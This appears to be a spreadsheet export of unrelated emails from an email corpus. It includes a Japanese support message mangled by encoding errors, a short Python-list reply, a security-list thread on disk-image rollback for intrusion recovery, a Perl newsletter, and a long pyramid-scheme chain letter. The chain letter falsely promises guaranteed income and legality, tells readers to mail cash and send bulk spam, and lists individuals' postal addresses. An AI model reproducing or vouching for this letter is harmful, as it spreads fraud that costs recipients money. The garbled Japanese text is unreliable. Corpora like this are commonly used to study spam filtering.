 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Livelink_x001b_$B$N=hM}$r:FEY9T$J$C$F$b%W%m%;%9%@%&amp;%s$K$J$k$3$H_x001b_(B
 &gt; &gt; _x001b_$B$O$J_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$/_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BESCf$G=*N;$7$F$$$k=hM}$,860x$G%W%m%;%9%@%&amp;%s$K$J$C$F$$_x001b_(B
 &gt; &gt; _x001b_$B$k$3_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$H$O_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$J$$_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$H_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B;W_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$$$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$*Aw$j$9$k%m%0$+$i%W%m%;%9%@%&amp;%s$N860x$H2r7hJ}K!$K$D$$_x001b_(B
 &gt; &gt; _x001b_$B$F$*_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$BCN$i_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$;$/_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$@_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$5_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$$!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$3$l$@$1$N%m%0$r3NG'$9$k$K$O!";~4V$,$+$+$j$^$9$N$G:G?7_x001b_(B
 &gt; &gt; (_x001b_$B#87n_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B#1#0_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$BF|_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; )_x001b_$B$N_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%m_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%0$+$i3NG'$r$*4j$$$$$?$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$J$*!";0I)2=3X%(%s%8%K%"%j%s%0MM$G$O!"%A%'%s%8%(!&lt;%8%'_x001b_(B
 &gt; &gt; _x001b_$B%s%H_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B=hM}_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$rJL_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Livelink_x001b_$B%5!&lt;%P$KJL$1$F$*$j$^$;$s!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%W%m%;%9%@%&amp;%sH/@8F|;~_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010626 03:00
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010626 09:56
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010627 13:17  - connect_x001b_$B%m%0$,Bg$-$$$?$a!"_x001b_(Bconnect_x001b_$B%m%0_x001b_(B
 &gt; &gt; _x001b_$B0J30_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$r_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; ftp_x001b_$B%5%$_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%H_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%"%C%W$7$^$7$?!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010708 22:09
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010710 04:00
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010710 08:05
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010718 09:10
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010718 09:28
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010725 10:50
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010731 08:26
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010807 11:00  - connect_x001b_$B%m%0$,Bg$-$$$?$a!"_x001b_(Bconnect_x001b_$B%m%0_x001b_(B
 &gt; &gt; _x001b_$B0J30_x001b_(B
 &gt; &gt; &gt; &gt; _x001b_$B$r_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; ftp_x001b_$B%5%$_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%H_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%"%C%W$7$^$7$?!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010809 09:01
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010810 08:57
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B$h$m$7$/$*4j$$$$$?$7$^$9!#_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001b_$B0KF#!!@55A_x001b_(B
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I believe the SpamAssassin maintainers have a scheme whereby the corpus
 &gt; of non-spam is distributed, ie. several people have bodies of non-spam
 &gt; that they use for collectively evolving the SA score set.  If that
 &gt; sounds vague, it matches my level of understanding.
 See if you can get a hold of that so we can do a level-playing-field
 competition. :-)
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: use of base image / delta image for automated recovery from a
</t>
  </si>
  <si>
    <t xml:space="preserve">I did something crudely along those lines for VMS VAX maybe 13 years
 ago; there is at least one product that does it for PC though I don't
 recall its name. It is also handy for cases where you have a CD image
 of some filesystem (or some other image of a filesystem) that is
 intrinsically readonly but whose filesystem will not accept (or is
 not graceful) readonly storage. It is also more or less necessary
 if you want to work with WORM file structures, which are older still.
 There have been a number of filesystems for those dating back to the
 early 1980s if not before.
 A generic facility of the type you mention is also one way to implement
 snapshots on top of an existing filesystem. The written information
 must (obviously!) be seekable so you can provide the illusion that you
 wrote to the storage. A device level implementation is however perfectly
 adequate.
 It does not, of course, distinguish for you what should have been changed
 and what should not. If you truly know a device (or perhaps a partition)
 must not be written, it can be simpler to either return error on writes,
 or to just return a fake success on writes yet discard the data. (NTFS
 lives with the latter strategy just fine from my experiments. I have not
 tried it on extf3 or reiser.) 
 BTW, think about your mention of RAID and consider the complexity of
 writing to RAID4 or RAID5...
 I would contend that with cheaper storage these days, it makes little sense
 to use RAID, save for shadowing and possibly striping. Those at least do
 not have the complexity and slowup dangers that higher RAID levels have, and
 there is not a need to save the cost of disk so much where a single disk
 may hold 200 gigs and up. Why not dedicate another whole disk to fault
 recovery
 and lose the complexity and slow write (sometimes) of RAID?
 Glenn Everhart
 -----Original Message-----
 From: bmord@icon-nicholson.com [mailto:bmord@icon-nicholson.com]
 Sent: Tuesday, September 03, 2002 3:04 PM
 To: Webappsec Securityfocus.Com; SECPROG Securityfocus
 Subject: use of base image / delta image for automated recovery from
 attacks
 Hi,
 I was inspired by a mode of operation supported by VMWare. You can have a
 base disk image shared by multiple virtual machine (vm) instances. That base
 image is never altered by a vm instance. Instead, each vm instance writes
 changes to its own "redo" log. Future hard disk reads from that vm instance
 incorporate both the base image and the appropriate redo log to present the
 current disk image for that specific virtual machine.
 This is described here (thanks to Duane for providing this link on the
 honeypots mailing list)
 http://www.vmware.com/support/reference/common/disk_sharing.html
 Could this basic concept be used to easily make self-fixing client/server
 applications that efficiently and automatically recover from most attacks,
 even before those attacks have been discovered? Here is what I imagine.
 The physical architectures of most production client/server systems are
 layered. For example, your basic web application might have a web server
 running Apache, connected to an application server running some J2EE or .Net
 business logic, connected to a database server for persistence. The only one
 of these whose disk image really should evolve over time is the database
 server, and even here you often put the static RDBMS software on one
 partition and the changeable datafiles on another partition. It is only the
 partition with the volatile datafiles that must be allowed to change from
 one boot to the next. Other paritions may need to be writable for, say, swap
 space, but these changes could be eliminated on each reboot.
 When someone cracks this system, they will probably change an image that
 shouldn't be changed. E.g., they might leverage a buffer overflow in IIS or
 Apache to install a trojan or a backdoor on the more exposed web server. But
 what if the web server ran off a base image, writing changes to a "delta" or
 "redo" partition? And then what if every night it automatically erased the
 redo partition and rebooted? The downtime involved for each machine would be
 minimal, because it is only deleting data - rather than restoring from
 backup. In a system with redundant web servers for load balancing or high
 availability, this could be scheduled in a way such that the system is
 always accessible. This base/redo partition concept could be implemented at
 the same level as a feature of hardware RAID, allowing for greater
 performance, reliability, and hack resistance. This concept could also be
 applied to the application servers, and even the database server partitions
 (except for those partitions which contain the table data files, of course.)
 Does anyone do this already? Or is this a new concept? Or has this concept
 been discussed before and abandoned for some reasons that I don't yet know?
 I use the physical architecture of a basic web application as an example in
 this post, but this concept could of course be applied to most server
 systems. It would allow for the hardware-separation of volatile and
 non-volatile disk images. It would be analogous to performing nightly
 ghosting operations, only it would be more efficient and involve less (or
 no) downtime.
 Thanks for any opinions,
 Ben
 **********************************************************************
 This transmission may contain information that is privileged, confidential and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you
 **********************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Hurtage etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 7 Aug 2002, Robert Harley wrote:
 &gt; Hmm... now I have an asymptotically faster precomputation algorithm
 Woo, faster is better... But what have you done about all those patents that
 prevent anyone from going near ECC in the first place, hmmmmmm?
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-10-02
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Announcing SouthFlorida.pm
 +--------------------------------------------------------------------+
 | Announcing SouthFlorida.pm                                         |
 |   posted by ziggy on Tuesday October 01, @10:50 (groups)           |
 |   http://use.perl.org/article.pl?sid=02/10/01/1450259              |
 +--------------------------------------------------------------------+
 [0]jbisbee writes "The South Florida Perl Mongers group is announcing its
 first social meeting to be held at [1]The Duck Tavern in Boca Raton, FL
 on Tuesday, October 15 at 7:30 PM. Please keep an eye on
 [2]southflorida.pm.org for updated news and events concerning
 southflorida.pm."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/01/1450259
 Links:
     0. http://www.jbisbee.com/
     1. http://yp.yahoo.com/py/ypMap.py?Pyt=Typ&amp;tuid=B:PB1632346&amp;ck=3694270848&amp;tab=B2C&amp;addr=1835+W+Hillsboro+Blvd&amp;city=Deerfield+Beach&amp;state=FL&amp;zip=33442-1401&amp;country=us&amp;slt=26.318237&amp;sln=-80.128829&amp;cs=9&amp;stat=:pos:3:regular:regT:19:fbT:0
     2. http://southflorida.pm.org/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</si>
  <si>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&lt; Make $50,000 in 90 Days Sending Emails at Home &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,
 You can make $50,000 or more in the next 90 days sending e-mail.
 Seem impossible? Is there a catch?  NO, there is no catch; just
 send your e-mails and be on your way to financial freedom.
 Basically, I send out as many of these e-mails as I can, then
 people send me CASH in the mail for information that I just e-mail
 back to them. Everyday, I make a three minute drive to my P.O. Box
 knowing that there are at least a few hundred dollars waiting for
 me.  And the best part, IT IS COMPLETELY LEGAL.
 Just read the next few paragraphs and see what you think. If you
 like what you read, great! If you don't, read it again because you
 must have missed something.
 "AS SEEN ON NATIONAL TELEVISION"
 "Making over a half million dollars every 6 months from your home
 for an investment of only $25 US dollars expense ONE TIME.  THANKS
 TO THE COMPUTER AGE AND THE INTERNET, BE A MILLIONAIRE LIKE OTHERS
 WITHIN A YEAR!!!  Before you say, "No Way!" read the following.
 This is the letter you've been reading about in the news lately.
 Due to the popularity of this letter on the Internet, a major
 nightly news program recently devoted an entire show to the
 investigation of the program described below to see if it really
 can make people money.
 The show also investigated whether or not the program was legal.
 Their findings proved once and for all that there are absolutely
 no laws prohibiting the participation in this program. This has
 helped to show people that this is a simple, harmless, and fun way
 to make some extra money at home.
 The results of this show have been truly remarkable. So many
 people are participating that those involved are doing much better
 than ever before. Since everyone makes more as more people try it
 out, its been very exciting to be a part of it lately. You will
 understand once you experience it.
 "HERE IT IS BELOW"
 *** Print This Now For Future Reference ***
 The following income opportunity is one you may be interested in
 taking a look at. It can be started with VERY LITTLE investment
 ($25) and the income return is TREMENDOUS!!!
 THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY.
 It does not require you to come into contact with people, do any
 hard work, and best of all, you never have to leave your house
 except to get the mail.
 Simply follow the instructions, and you really can make this
 happen. This e-mail order marketing program works every time if
 you put in the effort to make it work. E-mail is the sales tool of
 the future. Take advantage of this non-commercialized method of
 advertising NOW!
 The longer you wait, the more savvy people will be taking your
 business using e-mail. Get what is rightfully yours. Program
 yourself for success and dare to think BIG. It sounds corny, but
 it's true. You'll never make it big if you don't have this belief
 system in place.
 MULTI-LEVEL MARKETING (MLM) has finally gained respectability.  It
 is being taught in the Harvard Business School, and both Stanford
 Research and the Wall Street Journal have stated that between 50%
 and 65% of all goods and services will be sold through multi-level
 methods.
 This is a Multi-Billion Dollar industry and of the 500,000
 millionaires in the U.S., 20% (100,000) made their fortune in the
 last several years in MLM. Moreover, statistics show 45people
 become millionaires everyday through Multi-Level Marketing.
 You may have heard this story before, but Donald Trump made an
 appearance on the David Letterman show. Dave asked him what he
 would do if he lost everything and had to start over from scratch.
 Without hesitating Trump said he would find a good network
 marketing company and get to work.
 The audience, started to hoot and boo him. He looked out at the
 audience and dead-panned his response. "That's why I'm sitting up
 here and you are all sitting out there!"
 With network marketing you have two sources of income. Direct
 commissions from sales you make yourself and commissions from
 sales made by people you introduce to the business.
 Residual income is the secret of the wealthy. It means investing
 time and money once, and getting paid again and again and again.
 In network marketing, it also means getting paid for the work of
 others.
 The enclosed information is something I almost let slip through my
 fingers. Fortunately, sometime later I reread everything and gave
 some thought and study to it.
 My name is Jonathan Rourke. Two years ago, the corporation I
 worked at for the past twelve years down- sized and my position
 was eliminated. After unproductive job interviews, I decided to
 open my own business. Over the past year, I incurred many
 unforeseen financial problems. I owed my family, friends and
 creditors over $35,000. The economy was taking a toll on my
 business and I just couldn't seem to make ends meet. I had to
 refinance and borrow against my home to support my family and
 struggling business. AT THAT MOMENT something significant happened
 in my life and I am writing to share that experience in hopes that
 this will change your life FOREVER FINANCIALLY!!!
 In mid December, I received this program via e-mail. Six month's
 prior to receiving this program, I had been sending away for
 information on various business opportunities. All of the programs
 I received, in my opinion were not cost effective. They were
 either too difficult for me to comprehend or the initial
 investment was too much for me to risk to see if they would work
 or not. One claimed that I would make a million dollars in one
 year. It didn't tell me I'd have to write a book to make it!
 But like I was saying, in December I received this program. I
 didn't send for it, or ask for it; they just got my name off a
 mailing list. THANK GOODNESS FOR THAT!!!
 After reading it several times, to make sure I was reading it
 correctly, I couldn't believe my eyes.
 Here was a MONEY MAKING PHENOMENON.
 I could invest as much as I wanted to start without putting me
 further into debt. After I got a pencil and paper and figured it
 out, I would at least get my money back. But like most of you I
 was still a little skeptical and a little worried about the legal
 aspects of it all. So I checked it out with the U.S. Post Office
 (1-800-725-2161 24 hrs) and they confirmed that it is indeed
 legal! After determining the program was LEGAL and NOT A CHAIN
 LETTER, I decided "WHY NOT."
 Initially I sent out 10,000 e-mails. It cost me about $15 for my
 time on-line. The great thing about e-mail is that I don't need
 any money for printing to send out the program, and because all of
 my orders are filled via e-mail, the only expense is my time. I am
 telling you like it is. I hope it doesn't turn you off, but I
 promised myself that I would not 'rip-off" anyone, no matter how
 much money it cost me.
 Here is the basic version of what you need to do:
 Your first goal is to receive at least 20 orders for Report #1
 within 2 weeks of your first program going out. IF YOU DON'T, SEND
 OUT MORE PROGRAMS UNTIL YOU DO.
 Your second goal is to receive at least 150+ orders for Report #2
 within 4 weeks. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO.
 Once you have your 150 orders, relax, you've met your goal. You
 will make $50,000+ but keep at it! If you don't get 150 right off,
 keep at it! It may take some time for your down line to build.
 Keep at it, stay focused, and do not let yourself get distracted.
 In less than one week, I was starting to receive orders for REPORT
 #1. I kept at it - kept mailing out the program and by January 13,
 1 had received 26 orders for REPORT #1. My first step in making
 $50,000 in 90 days was done.
 By January 30, 1 had received 196 orders for REPORT #2; 46 more
 than I needed. So I sat back and relaxed. By March 1, of my
 e-mailing of 10,000, I received $58,000 with more coming in every
 day. I paid off ALL my debts and bought a much needed new car.
 Please take time to read the attached program, IT WILL CHANGE YOUR
 LIFE FOREVER!!  Remember, it won't work if you don't try it. This
 program does work, but you must follow it EXACTLY! Especially the
 rules of not trying to place your name in a different place. It
 won't work, you'll lose out on a lot of money!
 In order for this program to work very fast, try to meet your goal
 of 20+ orders for Report #1, and 150+ orders for Report #2 and you
 will make $50,000 or more in 90 days. If you don't reach the first
 two goals with in four weeks, relax, you will still make a ton of
 money, it may take a few months or so longer. But keep mailing out
 the programs and stay focused! That's the key.  I AM LIVING PROOF
 THAT IT WORKS!!! If you choose not to participate in this program,
 I am sorry. It really is a great opportunity with little cost or
 risk to you. If you choose to participate, follow the program and
 you will be on your way to financial security.
 If you are a fellow business owner and are in financial trouble
 like I was, or you want to start your own business, consider this
 a sign. I DID!  -Sincerely,  Jonathan Rourke
 P.S.  Do you have any idea what 11,700 $5 bills ($58,000) look
 like piled up on a kitchen table? IT'S AWESOME!
 A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM:
 By the time you have read the enclosed program and reports, you
 should have concluded that such a program, and one that is legal,
 could not have been created by an amateur.
 Let me tell you a little about myself. I had a profitable business
 for 10 years. Then in 1979 my business began falling off. I was
 doing the same things that were previously successful for me, but
 it wasn't working.
 Finally, I figured it out. It wasn't me; it was the economy.
 Inflation and recession had replaced the stable economy that had
 been with us since 1945.
 I don't have to tell you what happened to the unemployment
 rate...because many of you know from first hand experience. There
 were more failures and bankruptcies than ever before.
 The middle class was vanishing. Those who knew what they were
 doing invested wisely and moved up. Those who did not including
 those who never had anything to save or invest were moving down
 into the ranks of the poor.
 As the saying goes, 'THE RICH GET RICHER AND THE POOR GET POORER."
 The traditional Methods of making money will never allow you to
 "move up" or "get rich". Inflation will see to that.
 You have just received information that can give you financial
 freedom for the rest of your life, with "NO RISK" and "JUST A
 LITTLE BIT OF EFFORT." You can make more money in the next few
 months than you have ever imagined.
 Follow the program EXACTLY AS INSTRUCTED. Do not change it in any
 way. It works exceedingly well as it is now. Remember to e-mail a
 copy of this exciting report to everyone you can think of. One of
 the people you send this to may send out 50,000 ... and your name
 will be on everyone of them!
 Remember though, the more you send out the more potential
 customers you will reach.
 So my friend, I have given you the ideas, information, materials
 and opportunity to become financially independent.  IT IS UP TO
 YOU NOW!
 "THINK ABOUT IT." Before you delete this program from your
 mailbox, as I almost did, take a little time to read it and REALLY
 THINK ABOUT IT. Get a pencil and figure out what could happen when
 YOU participate. Figure out the worst possible response and no
 matter how you calculate it, you will still make a lot of money!
 You will definitely get back what you invested. Any doubts you
 have will vanish when your first orders come in. IT WORKS! -Jody
 Jacobs, Richmond, VA
 HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU THOUSANDS OF DOLLAR$
 This method of raising capital REALLY WORKS 100% EVERY TIME. I am
 sure that you could use up to $50,000 or more in the next 90 days.
 Before you say "No Way!" please read this program carefully. This
 is not a chain letter, but a perfectly legal money making
 opportunity. Basically, this is what you do:  As with all
 multilevel businesses, we- build our business by recruiting new
 partners and selling our products. Every state in the USA allows
 you to recruit new multilevel business partners, and we offer a
 product for EVERY dollar sent. YOUR ORDERS COME BY MAIL AND ARE
 FILLED BY E-MAIL, so you are not involved in personal selling. You
 do it privately in your own home, store, or office.
 This is the GREATEST Multi-Level Mail Order Marketing anywhere:
 This is what you MUST do.
 1. Order all 5 reports shown on the list below (You can't sell
 them if you don't have them).
 * For each report, send $5.00 CASH, the NAME &amp; NUMBER OF THE
 REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR NAME &amp;
 RETURN ADDRESS (in case of a problem).
 *MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE - IN CASE OF
 ANY MAIL PROBLEMS!
 * When you place your order, make sure you order each of the five
 reports. You need all five reports so that you can save them on
 your computer and resell them.
 * Within a few days you will receive, via e-mail, each of the five
 reports. Save them on your computer so they will be accessible for
 you to send to the 1,000's of people who will order them from you.
 2. IMPORTANT- DO NOT alter the names of the people who are listed
 next to each report, or their order
 on the list in any way other than as instructed below in steps "a"
 through 'g" or you will lose out on the majority of your profits.
 Once you understand the way this works you'll also see how it
 doesn't work if you change it. Remember, this method has been
 tested, and if you alter it, it will not work.
 a. Look below for the listing of available reports.
 b. After you've ordered the. five reports, take this Advertisement
 and remove the name and address under REPORT #5. This person has
 made it through the cycle and is no doubt counting their $50,000!
 c. Move the name and address under REPORT #4 down to REPORT #5.
 d. Move the name and address under REPORT #3 down to REPORT #4.
 e. Move the name and address under REPORT #2 down to REPORT #3
 f. Move the name and address under REPORT #1 down to REPORT #2.
 g. Insert your name and address in the REPORT #1 position.
 Please make sure you copy every name and address ACCURATELY! Copy
 and paste method works well,.
 3. Take this entire letter, including the modified list of names,
 and save it to your computer. Make NO changes to the Instruction
 portion of this letter.
 Your cost to participate in this is practically nothing (surely
 you can afford $25). You obviously already have an Internet
 Connection and e-mail is FREE!
 To assist you with marketing your business on the internet, the 5
 reports you purchase will provide you with invaluable marketing
 information which includes how to send bulk e-mails, where to find
 thousands of free classified ads and much, much more.
 Here are two primary methods of building your downline:
 METHOD #1: SENDING BULK E-MAIL
 Let's say that you decide to start small, just to see how it goes,
 and we'll assume you and all those involved send out only 2,000
 programs each. Let's also assume that the mailing receives a 0.5%
 response. Using a good list, the response could be much better.
 Also, many people will send out hundreds of thousands of programs
 instead of 2,000. But continuing with this example, you send out
 only 2,000 programs. With a 0.5% response, that is only 10 orders
 for REPORT #1. Those 10 people respond by sending out 2,000
 programs each for a total of 20,000. Out of those 0.5%, 100 people
 respond and order REPORT #2.
 Those 100 mail out 2,000 programs each for a total of 200,000. The
 0.5% response to that is 1,000 orders for REPORT #3. Those 1,000
 send out 2,000 programs each for a 2,000,000 total. The 0.5%
 response to that is I 0,000 orders for REPORT #4. That amounts to
 10,000 each of $5 bills for you in CASH MONEY! Then think about
 level five!  That's $500,000 alone!
 Your total income in this example is $50 + $500 + $5,000+ $50,000
 + $500,000 for a total of $555,550!!!
 REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF THE 2,000 PEOPLE
 YOU MAIL TO WILL DO ABSOLUTELY NOTHING AND TRASH THIS PROGRAM!
 DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE, OR HALF
 SENT OUT 100,000 PROGRAMS INSTEAD OF 2,000. Believe me, many
 people will do just that and more!
 REPORT #2 will show you the best methods for bulk e-mailing, and
 e-mail software.
 METHOD #2 - PLACING FREE ADS ON THE INTERNET
 1. Advertising on the Net is very, very inexpensive, and there are
 HUNDREDS of FREE places to advertise. Let's say you decide to
 start small just to see how well it works. Assume your goal is to
 get ONLY 10 people to participate on your first level. Placing a
 lot of FREE ads on the internet will EASILY get a larger response.
 Also assume that everyone else in YOUR ORGANIZATION gets ONLY 10
 downline members. Follow this example to achieve the STAGGERING
 results below:
 1st level-your 10 members with $5 ....... $50
 2nd level-10 members from those 10 ($5 x 100) ....... $500
 3rd level-10 members from those 100 ($5 x 1,000).......  $5,000
 4th level-10 members from those 1,000 ($5 x 10k) .......  $50,000
 5th level-10 members from those 10,000 ($5 x 100k) .......  $500,000
 THIS TOTALS     -      $555,550
 Remember friends, this assumes that the people who participate
 only recruit 10 people each. Think for a moment what would happen
 if they got 20 people to participate! Most people get 100's of
 participants.
 THINK ABOUT IT! For every $5.00 you receive, all you must do is
 e-mail them the report they ordered. THAT'S IT! ALWAYS PROVIDE
 SAME-DAY SERVICE ON ALL ORDERS! This will guarantee that the
 e-mail THEY send out with YOUR name and address on it will be
 prompt because they can't advertise until they receive the report!
 AVAILABLE REPORTS         *** Order Each REPORT by NUMBER, AND
 NAME ***
 * ALWAYS SEND $5 CASH (U.S. CURRENCY) FOR EACH REPORT. CHECKS NOT
 ACCEPTED * - ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL - Make
 sure the cash is concealed by wrapping it in at least two sheets
 of paper (SO THAT THE BILL CAN'T BE SEEN AGAINST LIGHT)  On one of
 those sheets of paper include:
 (a) the number &amp; name of the report you are ordering,
 (b) your e-mail address, and
 (c) your name &amp; postal address (in case your e-mail provider
 encounters problems).
 PLACE YOUR ORDER FOR THESE REPORTS NOW:
 REPORT #1 "The Insiders Guide to Advertising for Free on the Internet"
 ORDER REPORT #1 FROM:
 Tony Goon
 120 - 8511 Westminster Hwy.
 Richmond, BC. V6X 3H7
 CANADA
 REPORT #2 "The Insiders Guide to Sending Bulk E-mail on the Internet"
 ORDER REPORT #2 FROM:
 Julie Lind
 Blk B 5-15,Prisma Perdana,
 Jalan Midah 8 A,Cheras
 56000 Kuala Lumpur,
 MALAYSIA.
 REPORT #3 "The Secrets to Multilevel Marketing on the Internet"
 ORDER REPORT #3 FROM:
 Mike IAT				
 PO Box 11360,
 50742 Kuala Lumpur,
 MALAYSIA.
 REPORT #4 'How to become a Millionaire utilizing the Power of 
 Multilevel Marketing and the Internet"
 ORDER REPORT #4 FROM:
 Ken Leung
 Flat B, 5/F, BLK 5,
 Serenity Park, Tai Po, N.T.
 Hong Kong
 REPORT #5 "How to Send One Million E-Mails for Free."
 ORDER REPORT #5 FROM:
 Randy Dallard
 P.O. Box 8
 Osprey, FL 34229
 U.S.A.
 About 50,000 new people get online every month!
 ******* TIPS FOR SUCCESS *******
 * TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and follow
 the directions accurately.
 * Send for the five reports IMMEDIATELY so you will have them when
 the orders start coming in. When you receive a $5 order, you MUST
 send out the requested product/report.
 * ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.
 * Be patient and persistent with this program. If you follow the
 instructions exactly, your results WILL BE SUCCESSFUL!
 * ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!
 ******* YOUR SUCCESS GUIDELINES *******
 Follow these guidelines to guarantee your success:
 Start posting ads as soon as you mail off for the reports! By the
 time you start receiving orders, your reports will be in your
 mailbox! For now, something simple, such as posting on message
 boards something to the effect of "Would you like to know how to
 earn $50,000 working out of your house with NO initial investment?
 Email me with the keywords "more info" to find out how. And, when
 they email you, send them this report in response!
 If you don't receive 20 orders for REPORT #1 within two weeks,
 continue advertising or sending e-mails until you do.
 Then, a couple of weeks later you should receive at least 100
 orders for REPORT#2. If you don't, continue advertising or sending
 e-mails until you do. Once you have received 100 or more orders
 for REPORT #2, YOU CAN RELAX, because the system is already
 working for you, and the cash will continue to roll in!
 THIS IS IMPORTANT TO REMEMBER: Every time your name is moved down
 on the list you are placed in front of a DIFFERENT report. You can
 KEEP TRACK of your PROGRESS by watching which report people are
 ordering from you. If you want to generate more income, send
 another batch of e-mails or continue placing ads and start the
 whole process again! There is no limit to the income you will
 generate from this business!
